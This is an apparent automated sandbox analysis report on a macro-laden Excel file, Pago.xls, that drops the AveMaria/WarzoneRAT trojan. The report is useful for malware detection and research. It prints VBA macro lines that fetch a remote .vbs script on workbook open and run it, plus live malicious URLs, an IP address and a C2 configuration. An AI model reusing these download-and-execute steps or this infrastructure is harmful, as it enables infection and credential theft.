Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/d | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\ .doc | Avira: detection malicious, Label: HEUR/Macro.Downloader.MRDO.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 8.2.NXRWIG.exe.3535870.4.raw.unpack | Malware Configuration Extractor: AveMaria {"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
Source: Pago.xls | ReversingLabs: Detection: 47%
Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\ .doc | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe | Joe Sandbox ML: detected
Source: Pago.xls | Joe Sandbox ML: detected

                Exploits

Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.3535870.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NXRWIG.exe PID: 3796, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: Binary string: C:\Users\PROG-MAX\Desktop\TOPROTECT\Protected\server1_protected.pdb | source: NXRWIG.exe, 00000008.00000000.517113620.0000000000152000.00000020.00000001.01000000.00000004.sdmp, NXRWIG.exe.5.dr, server1_protected[1].exe.5.dr

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: server1_protected[1].exe.5.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global traffic | TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global traffic | TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global traffic | TCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163

                Networking

                Source: C:\Windows\System32\wscript.exe | Domain query: www.stipamana.com
                Source: C:\Windows\System32\wscript.exe | Network Connect: 87.121.86.205 443
                Source: Malware configuration extractor | URLs: dns.stipamana.com
                Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: global traffic | HTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.doc HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.stipamana.com
                Source: global traffic | HTTP traffic detected: GET /exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbs
                Source: wscript.exe, 00000004.00000003.380708506.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381097860.0000000003818000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380859681.0000000003818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global traffic | DNS traffic detected: DNS query: www.stipamana.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_094bb4af-8

                E-Banking Fraud

                Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: Pago.xls | OLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set WshShell = CreateObject("WScript.Shell") | Name: Workbook_Open
                Source: .doc.4.dr | OLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Source: Pago.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False) | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Open() | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Write(<binary payload, not printable; omitted here>) | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs") | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'ADODB.Stream' functions open, savetofile, write | Name: Workbook_Open
                Source: Pago.xls.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: 57230000.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: .doc.4.dr | Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: Pago.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send | Name: Workbook_Open
                Source: Pago.xls.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: 57230000.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: .doc.4.dr | Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: Pago.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6, String ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
                Source: Pago.xls.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: 57230000.0.dr | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: .doc.4.dr | Stream path 'Macros/VBA/ThisDocument' : found hex strings
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbs
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exe
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00385470 NtSetContextThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_003850F8 NtResumeThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00385318 NtWriteVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00384FC8 NtReadVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00385469 NtSetContextThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00384FC1 NtReadVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_0038722E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_0038180F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00381071
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00381258
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00380848
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_003834AF
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_003846F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00387EC0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00384110
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00381589
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_0038083A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_003846E2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe | Code function: 8_2_00384104
                Source: Pago.xls | OLE, VBA macro line: Private Sub Workbook_Open()
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open | Name: Workbook_Open
                Source: Pago.xls.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
                Source: Pago.xls.0.dr | OLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
                Source: Pago.xls.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: Pago.xls.0.dr | OLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: Pago.xls.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
                Source: Pago.xls.0.dr | OLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
                Source: Pago.xls.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
                Source: Pago.xls.0.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_3__ob 35, , "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_0__ob 40,
                Source: Pago.xls.0.dr | OLE, VBA macro line: JbxHook_Open_1__ob 46, , ()
                Source: 57230000.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
                Source: 57230000.0.dr | OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
                Source: 57230000.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: 57230000.0.dr | OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: 57230000.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
                Source: 57230000.0.dr | OLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
                Source: 57230000.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
                Source: 57230000.0.dr | OLE, VBA macro line: Private Sub Workbook_Open()
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_3__ob 35, , "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_0__ob 40,
                Source: 57230000.0.dr | OLE, VBA macro line: JbxHook_Open_1__ob 46, , ()
                Source: .doc.4.dr | OLE, VBA macro line: Private Sub Document_Close()
                Source: Pago.xls | OLE indicator, VBA macros: true
                Source: Pago.xls.0.dr | OLE indicator, VBA macros: true
                Source: 57230000.0.dr | OLE indicator, VBA macros: true
                Source: .doc.4.dr | OLE indicator, VBA macros: true
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
